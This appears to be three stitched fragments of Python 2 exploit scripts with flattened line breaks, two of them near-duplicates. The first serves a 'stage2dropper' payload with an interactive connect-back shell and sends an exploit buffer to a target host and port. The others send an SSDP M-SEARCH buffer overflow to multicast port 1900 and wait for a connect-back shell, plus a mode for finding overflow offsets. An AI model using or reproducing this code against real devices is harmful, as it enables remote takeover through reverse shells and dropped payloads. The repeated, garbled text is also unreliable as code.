print "Found value %s at\noffset: %d" % (search_value,offset) exit(0) addr=sys.argv[1] port=int(sys.argv[2]) pid=1 files_to_serve=["./stage2dropper","./helloworld"] server=TrojanServer(CALLBACK_IP,files_to_serve,connectback_shell=True,startcmd="/bin/sh -i") pid=server.serve() time.sleep(1) if pid: try: sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((addr,port)) logger.LOG_INFO("sending exploit.") sock.send(str(buf)) sock.close() server.wait() except Exception as e: logger.LOG_WARN("Failed to connect. ") logger.LOG_WARN("Failed to connect. Killing connect-back server.") server.shutdown() else: logger.LOG_WARN("Failed to start connect-back server.") sys.exit(1)
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string) pid = None if len(sys.argv) > 1: search_string = sys.argv[1] if "0x" == search_string[0:2]: search_string_num = int(search_string, 0) search_string = struct.pack(">L", search_string_num) offset = buffer_overflow_string.find_offset(search_string) if offset < 0: print "Couldn't find string %s in the overflow buffer." % search_string else: print "Found string %s at\noffset: %d" % (search_string, offset) else: pid = connectback_server.serve() # sys.stdout.write(str(msearch_string)) if pid: try: logger.LOG_INFO("Sending exploit") send_multicast("239.255.255.250", 1900, str(msearch_string)) connectback_server.wait() except Exception as e: print e connectback_server.shutdown() else: logger.LOG_WARN("Failed to start connect-backserver.") sys.exit(1)
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string) pid = None if len(sys.argv) > 1: search_string = sys.argv[1] if "0x" == search_string[0:2]: search_string_num = int(search_string, 0) search_string = struct.pack(">L", search_string_num) offset = buffer_overflow_string.find_offset(search_string) if (offset < 0): print "Couldn't find string %s in the overflow buffer." % search_string else: print "Found string %s at\noffset: %d" % (search_string, offset) else: pid = connectback_server.serve() #sys.stdout.write(str(msearch_string)) if pid: try: logger.LOG_INFO("Sending exploit") send_multicast("239.255.255.250", 1900, str(msearch_string)) connectback_server.wait() except Exception as e: print e connectback_server.shutdown() else: logger.LOG_WARN("Failed to start connect-backserver.") sys.exit(1)